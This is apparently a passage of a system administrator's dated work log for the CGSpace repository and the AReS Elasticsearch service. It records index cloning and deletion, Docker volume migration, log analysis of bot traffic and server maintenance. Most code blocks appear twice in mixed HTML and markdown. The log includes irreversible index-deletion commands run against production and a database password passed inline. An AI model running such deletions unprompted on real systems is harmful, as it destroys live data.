</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><ul>

- I still need to do cleanup on the journal articles metadata
  - Peter sent me some cleanups but I can't use them in the search/replace format he gave
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT dspace_object_id AS id, text_value as &#34;cg.journal&#34; FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
COPY 32087
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT dspace_object_id AS id, text_value as &#34;cg.journal&#34; FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 32087
</span></span></code></pre></div><ul>

- I used OpenRefine to remove all journal values that didn't have one of these characters: ; ( )
  - Then I cloned the `cg.journal` field to `cg.volume` and `cg.issue`
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">value.partition(&#39;;&#39;)[0].trim() # to get journal names
value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^(\d+)\(\d+\)/,&#34;$1&#34;) # to get journal volumes
value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;) # to get journal issues
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.partition(&#39;;&#39;)[0].trim() # to get journal names
</span></span><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^(\d+)\(\d+\)/,&#34;$1&#34;) # to get journal volumes
</span></span><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;) # to get journal issues
</span></span></code></pre></div><ul>

- Then I uploaded the changes to CGSpace using `dspace metadata-import`
- Margarita from CCAFS was asking about an error deleting some items that were showing up in Google and should have been private
- I migrated the Docker bind mount for the AReS Elasticsearch container to a Docker volume:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker-compose -f docker/docker-compose.yml down
$ docker volume create docker_esData_7
$ docker container create --name es_dummy -v docker_esData_7:/usr/share/elasticsearch/data:rw elasticsearch:7.6.2
$ docker cp docker/esData_7/nodes es_dummy:/usr/share/elasticsearch/data
$ docker rm es_dummy
# edit docker/docker-compose.yml to switch from bind mount to volume
$ docker-compose -f docker/docker-compose.yml up -d
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml down
</span></span><span style="display:flex;"><span>$ docker volume create docker_esData_7
</span></span><span style="display:flex;"><span>$ docker container create --name es_dummy -v docker_esData_7:/usr/share/elasticsearch/data:rw elasticsearch:7.6.2
</span></span><span style="display:flex;"><span>$ docker cp docker/esData_7/nodes es_dummy:/usr/share/elasticsearch/data
</span></span><span style="display:flex;"><span>$ docker rm es_dummy
</span></span><span style="display:flex;"><span># edit docker/docker-compose.yml to switch from bind mount to volume
</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml up -d
</span></span></code></pre></div><ul>

- The trick is that when you create a volume like "myvolume" from a `docker-compose.yml` file, Docker will create it with the name "docker_myvolume"
  - If you create it manually on the command line with `docker volume create myvolume` then the name is literally "myvolume" (see the quick demo after this list)
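
A quick demonstration of the naming behavior (a sketch; the `docker volume ls` output is abbreviated, and the `docker_` prefix comes from the compose project directory):

```console
$ docker volume create myvolume
myvolume
$ docker volume ls
DRIVER    VOLUME NAME
local     docker_esData_7
local     myvolume
```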

- I still need to make the changes to git master and add these notes to the pull request so Moayad and others can benefit
- Delete the `openrxv-items-temp` index to test a fresh harvesting:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</code></pre></div><h2 id="2021-03-05-1">2021-03-05</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span></code></pre></div><h2 id="2021-03-05-1">2021-03-05</h2>

- Check the results of the AReS harvesting from last night:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 101761,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 101761,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>

- Set the current items index to read only and make a backup:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-05
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-05
</span></span></code></pre></div><ul>

- Delete the current items index and clone the temp one to it:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span></code></pre></div><ul>

- Then delete the temp and backup:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
{&#34;acknowledged&#34;:true}%
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-03-05&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true}%
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-03-05&#39;</span>
</span></span></code></pre></div><ul>

- I made some pull requests to OpenRXV:
  - [docker/docker-compose.yml: Use docker volumes](https://github.com/ilri/OpenRXV/pull/86)
- On my local test instance the `openrxv-items` alias points to the `openrxv-items-final` index, as expected:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
...
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span></code></pre></div><ul>

- But on AReS production `openrxv-items` has somehow become a concrete index:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
...
&#34;openrxv-items&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {}
},
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span></code></pre></div><ul>

- I fixed the issue on production by cloning the `openrxv-items` index to `openrxv-items-final`, deleting `openrxv-items`, and then re-creating it as an alias:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-07
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-final
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-07
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-final
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</span></span></code></pre></div><ul>

- Delete backups and remove read-only mode on `openrxv-items`:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-03-07&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-03-07&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><ul>

- Linode sent alerts about the CPU usage on CGSpace yesterday and the day before
  - Looking in the logs I see a few IPs making heavy usage on the REST API and XMLUI:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E <span style="color:#e6db74">&#39;0[56]/Mar/2021&#39;</span> | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E <span style="color:#e6db74">&#39;0[56]/Mar/2021&#39;</span> | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</span></span></code></pre></div><ul>

- I see the usual IPs for CCAFS and ILRI importer bots, but also `143.233.242.132` which appears to be for GARDIAN:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zgrep <span style="color:#e6db74">&#39;143.233.242.132&#39;</span> /var/log/nginx/access.log.1 | grep -c Delphi
6237
# zgrep <span style="color:#e6db74">&#39;143.233.242.132&#39;</span> /var/log/nginx/access.log.1 | grep -c -v Delphi
6418
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zgrep <span style="color:#e6db74">&#39;143.233.242.132&#39;</span> /var/log/nginx/access.log.1 | grep -c Delphi
</span></span><span style="display:flex;"><span>6237
</span></span><span style="display:flex;"><span># zgrep <span style="color:#e6db74">&#39;143.233.242.132&#39;</span> /var/log/nginx/access.log.1 | grep -c -v Delphi
</span></span><span style="display:flex;"><span>6418
</span></span></code></pre></div><ul>

- They seem to make requests twice, once with the Delphi user agent that we know and already mark as a bot, and once with a "normal" user agent
  - Looking in Solr I see they have been using this IP for awhile, as they have 100,000 hits going back into 2020 (the query is sketched after this list)
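
For reference, checking an IP's hits in the DSpace statistics core is a query along these lines (a sketch; I'm assuming Solr listening on localhost:8081 here, and `numFound` in the response is the hit count):

```console
$ curl -s 'http://localhost:8081/solr/statistics/select?q=ip:143.233.242.132&rows=0&wt=json&indent=true'
```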
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
13
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>13
</span></span></code></pre></div><ul>

- On 2021-03-03 the PostgreSQL transactions started rising:

![PostgreSQL query length week](/cgspace-notes/2021/03/postgres_querylength_ALL-week.png)

- Back up the current `openrxv-items-final` index to start a fresh AReS harvest:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-08
# start harvesting on AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-08
</span></span><span style="display:flex;"><span># start harvesting on AReS
</span></span></code></pre></div><ul>

- As I saw on my local test instance, even when you cancel a harvesting, it replaces the `openrxv-items-final` index with whatever is in `openrxv-items-temp` automatically, so I assume it will do the same now

## 2021-03-09
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><h2 id="2021-03-10">2021-03-10</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><h2 id="2021-03-10">2021-03-10</h2>

- Colleagues from ICARDA asked about how we should handle ISI journals in CG Core, as CGSpace uses `cg.isijournal` and MELSpace uses `mel.impact-factor`
- Peter said he doesn't see "Source Code" or "Software" in the [output type facet on the ILRI community](https://cgspace.cgiar.org/handle/10568/1/search-filter?field=type), but I see it on the home page, so I will try to do a full Discovery re-index:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 318m20.485s
user 215m15.196s
sys 2m51.529s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 318m20.485s
</span></span><span style="display:flex;"><span>user 215m15.196s
</span></span><span style="display:flex;"><span>sys 2m51.529s
</span></span></code></pre></div><ul>

- Now I see ten items for "Source Code" in the facets...
- Add GPL and MIT licenses to the list of licenses on CGSpace input form since we will start capturing more software and source code
- Added the ability to check `dcterms.license` values against the SPDX licenses in the csv-metadata-quality tool

## 2021-03-14

- Switch to linux-kvm kernel on linode20 and linode18:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># apt update <span style="color:#f92672">&amp;&amp;</span> apt full-upgrade
# apt install linux-kvm
# apt remove linux-generic linux-image-generic linux-headers-generic linux-firmware
# apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
# reboot
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># apt update <span style="color:#f92672">&amp;&amp;</span> apt full-upgrade
</span></span><span style="display:flex;"><span># apt install linux-kvm
</span></span><span style="display:flex;"><span># apt remove linux-generic linux-image-generic linux-headers-generic linux-firmware
</span></span><span style="display:flex;"><span># apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
</span></span><span style="display:flex;"><span># reboot
</span></span></code></pre></div><ul>

- Deploy latest changes from `6_x-prod` branch on CGSpace
- Deploy latest changes from OpenRXV `master` branch on AReS
- Last week Peter added OpenRXV to CGSpace: <https://hdl.handle.net/10568/112982>
- Back up the current `openrxv-items-final` index on AReS to start a new harvest:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-14
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-14
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><ul>

- After the harvesting finished it seems the indexes got messed up again, as `openrxv-items` is an alias of `openrxv-items-temp` instead of `openrxv-items-final`:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
...
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span></code></pre></div><ul>

- Anyways, the number of items in `openrxv-items` seems OK and the AReS Explorer UI is working fine
  - I will have to manually fix the indexes before the next harvesting (see the sketch after this list)
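
The manual fix is the same dance as on 2021-03-05, roughly (a condensed sketch of the commands used above, to run before the next harvest):

```console
$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
```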

